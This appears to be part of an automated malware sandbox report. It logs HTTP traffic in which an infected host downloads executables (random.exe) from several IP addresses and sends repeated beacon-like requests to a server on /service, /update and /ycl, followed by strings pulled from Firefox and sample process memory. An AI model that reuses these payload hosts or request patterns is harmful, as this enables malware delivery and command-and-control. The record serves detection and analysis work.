Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Tue, 25 Feb 2025 19:05:24 GMTIf-None-Match: "54e00-62efc23970500"
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/bonus_max/random.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Sat, 01 Mar 2025 15:00:50 GMTIf-None-Match: "310600-62f4930517c6a"
Source: global traffic	HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Sat, 01 Mar 2025 15:02:28 GMTIf-None-Match: "1cf600-62f49362c1f1e"
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Sat, 01 Mar 2025 15:23:00 GMTIf-None-Match: "47d600-62f497fa124d0"
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7If-Modified-Since: Sat, 01 Mar 2025 15:20:21 GMTIf-None-Match: "3c3a00-62f497622938c"
Source: global traffic	HTTP traffic detected: GET /success?substr=mixfour&s=three&sub=non HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /info HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /update HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success?substr=mixtwo&s=three&sub=non HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /info HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /update HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ycl HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ycl HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ycl HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ycl HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache

Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3105196678.0000020F7FB56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: 5a20b6327b.exe, 0000000B.00000003.2339137574.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.3016825878.0000020F063B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000022.00000002.3016825878.0000020F0633F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"user": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
